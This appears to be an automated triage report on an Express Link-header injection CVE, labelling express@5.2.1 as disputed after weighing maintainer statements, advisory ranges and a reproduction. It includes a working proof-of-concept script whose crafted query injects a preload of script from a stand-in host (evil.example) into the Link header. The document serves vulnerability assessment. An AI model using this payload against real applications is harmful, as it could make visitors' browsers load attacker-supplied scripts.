CVE-2024-10491
pkg:npm/express@5.2.1
Why this label
- evidence_sufficient 0.77 ≥ 0.50
- → DISPUTED: credible_dispute_exists 0.95 ≥ 0.60 and no stronger rule applied
Generated 2026-10-04 19:55 UTC · investigators anthropic/claude-sonnet-5.5 · judge typesafe-ai/jev
Claims
| Claim | Verdict | Technically supported | Credibly disputed |
|---|---|---|---|
The affected product is the Express package. product · asserted by CVE description, NVD, GHSA, OSV | ✓ supported | 0.97 | 0.05 |
NVD identifies affected versions as >=3.0.0 and <3.21.5. versions · asserted by NVD | ? disputed | 0.39 | 0.55 |
GHSA identifies affected versions as <=3.21.4. versions · asserted by GHSA | ✓ supported | 0.75 | 0.33 |
OSV identifies affected versions as <4.0.0-rc1. versions · asserted by OSV | ? disputed | 0.64 | 0.57 |
Exploitation requires no privileges. auth · asserted by CVSS | · unverified | 0.60 | 0.06 |
The attack vector is network-based. vector · asserted by CVSS | · unverified | 0.38 | 0.05 |
Attack complexity is high. vector · asserted by CVSS | · unverified | 0.41 | 0.08 |
Exploitation requires no user interaction. vector · asserted by CVSS | · unverified | 0.60 | 0.09 |
express@5.2.1 is affected by CVE-2024-10491 target · asserted by the scan or report under review | ? disputed | 0.83 | 0.94 |
Technical evidence
- Fix
- Not identified
- Vulnerable code
- lib/response.js, res.links(): builds `<${url}>; rel="${rel}"` by string interpolation with no encoding or validation of `>`, `,`, `;` or `"`. Attacker-controlled link values can close the URL and add extra Link entries or params. No fix found; the code is unchanged in 3.21.2, 4.0.0, 4.21.2, 5.0.0-alpha.1 and 5.2.1.
- PoC
- Start an express app whose handler calls res.links({next: req.query.u}) with a crafted value. Print the Link response header and check for an injected extra entry (<https://evil.example/p.js>; rel="preload").
Script
const express=require(require('path').resolve(process.argv[2],'node_modules/express'));const http=require('http');
const app=express();
app.get('/',(q,r)=>{r.links({next:q.query.u});r.end('ok')});
const s=app.listen(0,()=>{
const u='http://a/x>; rel="next", <https://evil.example/p.js>; rel="preload"; as="script';
http.get({port:s.address().port,path:'/?u='+encodeURIComponent(u)},res=>{console.log(res.headers.link);s.close()});
});
// run: node poc.js v5.2.1| Version | Role | Result |
|---|---|---|
| 5.2.1 | target | reproduced Link: <http://a/x>; rel="next", <https://evil.example/p.js>; rel="preload"; as="script>; rel="next" (injected preload entry present) |
| 3.21.2 | positive control | reproduced Same injected Link header. 3.21.2 is the latest 3.x on npm. |
| 4.21.2 | other | reproduced Same injected Link header. |
| 4.0.0 | other | reproduced Same injected Link header. This is outside OSV's <4.0.0-rc1 range. |
| 5.0.0-alpha.1 | other | reproduced Same injected Link header. |
| 3.21.5 | fixed | not run No such version on npm. 3.21.x releases stop at 3.21.2, so there is no fixed release to compare. |
I did not read the issue thread or any maintainer stance. Only Link header injection was tested, not browser preload behavior. It needs an app that passes untrusted input into res.links. The behavior is unchanged across 3.x, 4.x and 5.x and no patch exists, so the advisory ranges do not track a code change. I did not fetch or read any commit diff.
Discourse evidence
Express maintainers say the issue affects only the 3.x line (EOL) and was patched in v4. They say any vendor flagging 4.x or 5.x is wrong. Sonatype's advisory deviation notice says all 4.x and 5.x versions are affected. Users report scanner hits on 4.21.x and 5.x. One user says they saw identical behaviour on 3.21.2 and 5.1.0. GHSA lists <=3.21.4 and patched 4.0.0-rc1, so 5.2.1 is outside that range.
This vulnerability is relevant only for Express >=3.0.0-alpha1 <=3.21.2.
this does not impact express after version `3.21.2`. If Nexus or some other vendor thinks they have a new report or this impacts more than the verified range they should use our standard security reporting methods
This was patched in v4 and if you have a vendor who is reporting this specific CVE for anything other than the 3.x line of `express` they are incorrect.
this vulnerability affects all available `4.x` and `5.x` versions.
Sonatype's research suggests that this CVE's details differ from those defined at NVD.
I ran the scenario reported in the CVE and am seeing the exact same result between version 3.21.2 and 5.1.0. What exactly was fixed?
this issue was indeed fixed after version `3.21.2` and is **NOT** a current vulnerability requiring a fix for `4.x` or `5.x`.
Affected versions <= 3.21.4 Patched versions 4.0.0-rc1
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N
Attack vector Network Attack complexity High Privileges required None User interaction None
Express response.links function, allowing for arbitrary resource injection in the Link header
is the sca check swearing at version 4.21.1 mb a false positive?
Unresolved
- Sonatype's reasoning and evidence for 4.x/5.x being affected was only seen second-hand; I did not fetch the OSS Index page.
- The maintainer statements give inconsistent upper bounds (<=3.21.2 vs. GHSA <=3.21.4).
- The NVD range (>=3.0.0 <3.21.5) and the OSV range (<4.0.0-rc1) were not independently fetched.
- No maintainer statement addresses 5.2.1 specifically.
- The madcorgi reproduction was not explained, and no maintainer answered what was fixed.
Jev scores
| Bug exists in some version | 0.96 |
| Target version affected | 0.82 |
| Evidence sufficient | 0.77 |
| Reproduced on target | 0.97 |
| Patch addresses the issue | 0.16 |
| Credible dispute exists | 0.95 |
| Impact matches description | 0.78 |
| Positive control reproduced | 0.96 |
| Authority of dispute (0 none – 3 maintainer) | 2.99 |
Official record
A vulnerability has been identified in the Express response.links function, allowing for arbitrary resource injection in the Link header when unsanitized data is used. The issue arises from improper sanitization in `Link` header values, which can allow a combination of characters like `,`, `;`, and `<>` to preload malicious resources. This vulnerability is especially relevant for dynamic parameters.
| Source | Affected ranges | Covers target? |
|---|---|---|
| nvd | >=3.0.0 <3.21.5 | no |
| ghsa | <= 3.21.4 | no |
| osv | <4.0.0-rc1 | no |
OSV reports for this exact version: none · CVSS 4 MEDIUM · CWE-74
Evidence quality
- ✗Fix commit or release identified
- ✓Vulnerable code path identified
- ✓Positive control reproduced
- ✓Target version tested
- ✓Maintainer or vendor statement found
- ✓Sources agree on whether the target is in range
Run history
- 2026-10-04 19:53 · succeeded · DISPUTED
- 2026-10-04 19:52 · failed
- 2026-10-04 19:49 · failed